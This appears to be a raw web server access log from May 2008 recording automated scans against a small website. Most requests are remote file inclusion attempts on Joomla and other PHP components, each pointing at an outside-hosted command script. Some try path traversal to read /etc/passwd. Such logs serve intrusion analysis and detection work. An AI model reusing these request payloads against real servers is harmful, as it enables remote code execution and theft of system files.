63.134.253.108 - - [25/May/2008:19:45:41 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:48:52 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:48:53 -0700] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:48:53 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:49:26 -0700] "GET /logs/access.log/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:49:27 -0700] "GET /index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
77.48.10.14 - - [25/May/2008:19:49:28 -0700] "GET /logs/index.php?mosConfig_absolute_path=http://azur-animation.com/img/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
193.111.11.7 - - [25/May/2008:19:50:03 -0700] "GET /index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "neighborhoodglimpses.com"
193.111.11.7 - - [25/May/2008:19:50:03 -0700] "GET /logs/index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "neighborhoodglimpses.com"
85.17.3.183 - - [25/May/2008:19:54:15 -0700] "GET /components/com_extcalendar/extcalendar.php?&mosConfig_absolute_path=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:19:56:00 -0700] "GET /logs/access.log//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:19:56:02 -0700] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:19:56:04 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:57:32 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:57:32 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:19:57:44 -0700] "GET /logs//index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:19:57:45 -0700] "GET //index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:58:45 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:58:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:59:02 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "neighborhoodglimpses.com"
82.78.216.197 - - [25/May/2008:19:59:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "neighborhoodglimpses.com"
72.47.201.117 - - [25/May/2008:20:00:02 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "neighborhoodglimpses.com"
72.47.201.117 - - [25/May/2008:20:00:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "neighborhoodglimpses.com"
72.47.201.117 - - [25/May/2008:20:00:24 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.neighborhoodglimpses.com"
72.47.201.117 - - [25/May/2008:20:00:24 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.neighborhoodglimpses.com"
193.111.11.7 - - [25/May/2008:20:00:40 -0700] "GET /index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
193.111.11.7 - - [25/May/2008:20:00:40 -0700] "GET /logs/index.php?root_path=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:02:04 -0700] "GET /logs//index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:02:05 -0700] "GET //index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:02:45 -0700] "GET //?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:04:20 -0700] "GET //index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:04:30 -0700] "GET //?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:04:38 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
69.16.242.144 - - [25/May/2008:20:07:39 -0700] "GET /logs/access_080211.log/index.php?go=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
69.16.242.144 - - [25/May/2008:20:07:39 -0700] "GET /index.php?go=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
69.16.242.144 - - [25/May/2008:20:07:39 -0700] "GET /logs/index.php?go=http://premier.com.tr/edestek/files/index.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:08:10 -0700] "GET /logs/index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:08:10 -0700] "GET /index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:08:31 -0700] "GET /logs/access_080211.log/index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:08:31 -0700] "GET /index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:08:32 -0700] "GET /logs/index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:09:12 -0700] "GET /logs/access_080225.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:09:12 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:09:12 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:09:12 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:09:20 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:09:20 -0700] "GET /logs//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 6520 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:09:23 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:09:27 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:10:25 -0700] "GET /logs/access_080414.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:10:25 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:10:26 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
62.112.193.46 - - [25/May/2008:20:10:58 -0700] "GET /logs/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.112.193.46 - - [25/May/2008:20:10:59 -0700] "GET /contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.146.45.29 - - [25/May/2008:20:13:22 -0700] "GET /logs/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.146.45.29 - - [25/May/2008:20:13:22 -0700] "GET /logs/contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.146.45.29 - - [25/May/2008:20:13:23 -0700] "GET /contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
62.146.45.29 - - [25/May/2008:20:13:23 -0700] "GET /contenido/includes/include.frontend.group.subnav.php?cfg[path][contenido]=http://copapetrobrasdetenis.com.br/admin/internas_upload/.ownz/safeon.gif??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:13:57 -0700] "GET //index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:14:36 -0700] "GET //index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:15:11 -0700] "GET /logs/access_080211.log//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:15:11 -0700] "GET /logs//?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 6520 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:15:35 -0700] "GET /logs//index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:15:35 -0700] "GET //index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:15:57 -0700] "GET /logs/access_080211.log/modules/My_eGallery/index.php?basepath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
158.227.2.24 - - [25/May/2008:20:15:58 -0700] "GET //?mosConfig_absolute_path=http://bigme.com.au//components/com_joomlalib/standalone/id.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
216.126.64.194 - - [25/May/2008:20:16:00 -0700] "GET /index.php?root_path=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:16:06 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
195.56.189.33 - - [25/May/2008:20:16:26 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
65.36.252.34 - - [25/May/2008:20:17:51 -0700] "GET //index.php?sourcedir=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:18:07 -0700] "GET /logs//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:18:07 -0700] "GET //index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:18:08 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:18:08 -0700] "GET //index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:18:09 -0700] "GET /logs//index.php?sourcedir=http://www.duclaux.net/wiki/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:18:20 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:18:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:25 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:26 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:41 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:41 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:18:43 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:18:43 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:18:49 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
76.12.32.214 - - [25/May/2008:20:18:50 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:56 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:18:58 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
67.19.120.178 - - [25/May/2008:20:18:58 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:18:59 -0700] "GET /logs//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:18:59 -0700] "GET //index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:19:00 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.84.98.162 - - [25/May/2008:20:19:01 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:20:36 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:20:36 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:20:38 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:20:38 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:20:45 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:21:19 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:21:19 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
85.17.103.109 - - [25/May/2008:20:21:20 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "neighborhoodglimpses.com"
209.62.26.18 - - [25/May/2008:20:21:37 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:22:06 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
87.106.10.53 - - [25/May/2008:20:22:07 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:22:19 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
70.85.4.244 - - [25/May/2008:20:22:19 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:23:49 -0700] "GET /logs/access_080211.log//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:23:49 -0700] "GET //index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
63.134.253.108 - - [25/May/2008:20:23:49 -0700] "GET /logs//index.php?sourcedir=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:08 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
70.84.192.18 - - [25/May/2008:20:25:08 -0700] "GET //index.php?sourcedir=http://www.needvisa.net/card/arab.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.neighborhoodglimpses.com"
212.241.193.243 - - [25/May/2008:20:25:25 -0700] "GET /logs/access.log//index.php?sourcedir=http://www.duclaux.net/wiki/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
